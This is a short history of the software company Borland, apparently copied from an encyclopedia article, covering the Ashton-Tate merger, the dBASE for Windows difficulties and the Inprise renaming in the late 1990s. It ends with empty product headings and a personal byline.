In September 1991 Borland purchased Ashton-Tate, bringing the dBase and InterBase databases to the house, in an all stock transaction. Competition with Microsoft was fierce. Microsoft launched the competing database Microsoft Access and bought the dBase clone FoxPro in 1992, undercutting Borland's prices. During the early 1990s Borland's implementation of C and C++ outsold Microsoft's. Borland survived as a company, but no longer had the dominance in software tools that it once had. It has gone through a radical transition in products, financing, and staff, now a very different company from the one which challenged Microsoft and Lotus in the early 1990s.
The internal problems that arose with the Ashton-Tate merger were a large part of the fall. Ashton-Tate's product portfolio proved to be weak, with no provision for evolution into the GUI environment of Windows. Almost all product lines were discontinued. The consolidation of duplicate support and development offices was costly and disruptive. Worst of all, the highest revenue earner of the combined company was dBASE with no Windows version ready. Borland had had an internal project to clone dBASE which was intended to run on Windows and was part of the strategy of the acquisition, but by late 1992 this was abandoned due to technical flaws and the company had to constitute a replacement team (the ObjectVision team, redeployed) headed by Bill Turpin to redo the job. Borland lacked the financial strength to project its marketing and move internal resources off other products to shore up the dBASE/W effort. Layoffs occurred in 1993 to keep the company afloat, the third instance of this in five years. By the time dBASE for Windows eventually shipped, the developer community had moved on to other products such as Clipper or FoxBase and dBASE never regained significant share of Ashton-Tate's former market. This happened against the backdrop of the rise in Microsoft's combined Office product marketing.

The Inprise years, and name changes

On November 25, 1996, Del Yocam was hired as Borland CEO and Chairman.
In 1997, Borland sold Paradox to Corel, but – importantly – retained all development rights for the core BDE. In November 1997, Borland acquired Visigenic, a middleware company that was focused on implementations of CORBA.
On April 29, 1998, Borland refocused its efforts on targeting enterprise applications development. Borland hired marketing firm Lexicon Branding to come up with a new name for the company. Borland CEO Del Yocam explained at the time that the new name, Inprise, was meant to evoke "integrating the enterprise".The idea was to integrate Borland's tools, Delphi, C++ Builder, and JBuilder with enterprise environment software, including Visigenic's implementations of CORBA, Visibroker for C++ and Java, and the new emerging product, Application Server.
For a number of years (both before and during the Inprise name) Borland suffered from serious financial losses and very poor public image. When the name was changed to Inprise, many thought Borland had gone out of business. In March 1999, dBase was sold to KSoft, Inc. which was soon renamed to dBASE Inc. (In 2004 dBASE Inc. was renamed to dataBased Intelligence, Inc.).
In 1999, in the middle of Borland's identity crisis, Dale L. Fuller replaced Yocam. At this time Fuller's title was "interim president and CEO." The "interim" was dropped in December 2000. Keith Gottfried served in senior executive positions with the company from 2000 to 2004.
A proposed merger between Inprise and Corel was announced in February 2000, aimed at producing Linux based products. The scheme was abandoned when Corel's shares fell and it became clear that there was really no strategic fit.
InterBase 6.0 was made available as an open source product in July 2000.


Products

Current products

Borland's current product line includes:

Old software, no longer actively sold by Borland

Programming tools
Databases
Utilities
Applications
Games

                                                                                                                 By :- BRijesh JOshi....